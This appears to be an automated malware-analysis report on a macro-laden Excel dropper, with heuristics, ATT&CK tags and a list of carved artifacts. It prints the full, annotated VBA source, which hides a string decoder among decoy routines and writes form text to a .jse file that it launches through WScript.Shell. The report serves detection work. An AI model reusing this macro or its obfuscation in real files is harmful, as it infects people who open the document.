Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic; T1204.002 Malicious File
The file is identified as malicious by ClamAV with the signature Xls.Dropper.Agent-7618878-0. Static analysis revealed VBA macros that call CreateObject and CallByName, both of which are commonly used for malicious purposes. The VBA script likely attempts to download and execute a second-stage payload, as indicated by the heuristic hits and the dropper classification of the signature.
Heuristics (5)

- ClamAV: Xls.Dropper.Agent-7618878-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Dropper.Agent-7618878-0
- VBA project inside OOXML (medium, 2 related findings, OOXML_VBA): Document contains a VBA project; VBA macros present
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (7)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3403 bytes | e443d444e4fbbf1636dc09e47aafa4532dd35667a9102dd1612aa2f894496629 |
Preview of macros.bas (first 1,000 lines of the extracted script; editor annotations are marked as such in comments):

```vba
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "ScrollBar1, 4, 0, MSForms, ScrollBar"
Attribute VB_Control = "TextBox1, 2, 1, MSForms, TextBox"
Attribute VB_Control = "OptionButton1, 1, 2, MSForms, OptionButton"
Private Juerdf As Integer
Public RInhu As String

Sub ForkLop()
    Dim PT As PivotTable
    For Each PT In ActiveSheet.PivotTables
        PT.RefreshTable
    Next PT
End Sub

' Editor annotation: string decoder. Every obfuscated literal below is padded
' with " y" and passed through this function, which strips the padding.
Private Function Rdrijji(s As String) As String
    Rdrijji = Replace(s, " y", "")
End Function

Sub HellOpers()
    Dim cl As Range
    For Each cl In ActiveSheet.UsedRange
        If Not Application.CheckSpelling(word:=cl.Text) Then
            cl.Interior.Color = vbRed
        End If
    Next cl
End Sub

Private Function RNefoo(Fcoolert As Long)
    On Error GoTo Handler
    If Target.Column = 1 And Target.Value <> "" Then
        Application.EnableEvents = False
        Target.Offset(0, 1) = Format(Now(), "dd-mm-yyyy hh:mm:ss")
        Application.EnableEvents = True
    End If
Handler:
    ' Editor annotation: the Rdrijji argument decodes to "WScript.Shell"; the method
    ' name comes from OptionButton1.Caption and RInhu (built in Nefgfoio) is passed
    ' as its first argument. The call type is computed at runtime from form properties.
    Application.EnableEvents = CallByName(CreateObject(Rdrijji(" yW ySc yri ypt y" & " y.Sh yel yl")), OptionButton1.Caption, (Fcoolert - Fcoolert) + Frame1.ScrollBars + 1, RInhu, OptionButton1.BackStyle)
End Function

Sub NikoLerd()
    Dim Myrange As Range
    Dim Myrow As Range
    Set Myrange = Selection
    For Each Myrow In Myrange.Rows
        If Myrow.Row Mod 2 = 1 Then
            Myrow.Interior.Color = vbCyan
        End If
    Next Myrow
End Sub

Private Sub Rfiint(Beyy7 As Long)
    RNefoo (Beyy7)
End Sub

Private Sub Nefgfoio()
    Dim Fbbert As String
    R = Juerdf
    Fbbert = UserForm1.TextBox1.Text
    ' Editor annotation: the Rdrijji argument decodes to "\..\..\..\..\..", so the
    ' output path is built relative to the Office startup path.
    FrKonert = Application.StartupPath & Rdrijji(" y\..\.. y\.. y\.. y\. y.")
    RInhu = FrKonert & "\" & Me.Name & Juerdf & ".swkiloaq."
    Dim NerdfI As Integer
    NerdfI = FreeFile
    If Me.EnableFormatConditionsCalculation Then
        NerdfI = NerdfI + (R - R)
    End If
    On Error Resume Next
    Open RInhu For Binary Lock Read Write As #NerdfI
    Put NerdfI, , Fbbert
    Close NerdfI
    If Me.EnableFormatConditionsCalculation Then
        ' Editor annotation: " yj yse" decodes to "jse", giving the file a .jse extension;
        ' Juerdf is 33, so Chr(Juerdf + 1) is Chr(34), a double quote, and RInhu becomes
        ' explorer.exe "<dropped .jse path>" before RNefoo passes it to CallByName.
        FileCopy RInhu, RInhu & Rdrijji(" yj yse")
        RInhu = RInhu & Rdrijji(" yj yse")
        RInhu = Rdrijji(" yex yplo yre yr.e yx ye ") & Chr(Juerdf + 1) & RInhu & Chr(Juerdf + 1)
    End If
End Sub

Private Sub CommandButton1_Click()
End Sub

Public Sub TextBox1_Change()
    Juerdf = 33
    Nefgfoio
    Rfiint 67
    HellOpers
End Sub

Private Sub Frame1_Layout()
    Me.EnableFormatConditionsCalculation = True
    TextBox1.Text = Me.Name
End Sub

Private Sub TextBox2_Change()
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{28AA62EB-49C4-4E0A-A584-4687D784B897}{BBAB5157-819B-4466-A0EB-D64AD08084B4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```
Remaining extracted artifacts:

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 372736 bytes | 2b886d12c8dfa10e1593b350dcd194411a71a48219e7761368b4d0e068cba2d9 |
| emf_00.emf | ooxml-emf | OOXML EMF part: xl/media/image5.emf | 1239252 bytes | f5a354630e3dc930c4c066f115f8f5e999f52b4eb7296652816d58b7daa5a3a7 |
| emf_01.emf | ooxml-emf | OOXML EMF part: xl/media/image3.emf | 1820 bytes | b5c8a7dc3448107275b022b1d9916501eebae0188316579e40f647709969481d |
| emf_02.emf | ooxml-emf | OOXML EMF part: xl/media/image4.emf | 1892 bytes | fe4764d781e957fb6f262f4710b740f33c36f5cfcba195c4e2bf68f870c27486 |
| emf_03.emf | ooxml-emf | OOXML EMF part: xl/media/image1.emf | 4956 bytes | ba1d2d4db877070dcd8513001d076d2b523dd7342d4960ef1753b4330fbfbc21 |
| emf_04.emf | ooxml-emf | OOXML EMF part: xl/media/image2.emf | 2384 bytes | 606470656217355e28bf2970315d2a216370f1e1da8c675170761c66a6c741dc |

Detection on vbaProject_00.bin: ClamAV Xls.Dropper.Agent-7618878-0; obfuscation or payload: likely (the carved artifact contains 2 eval/decoder/string-building tokens).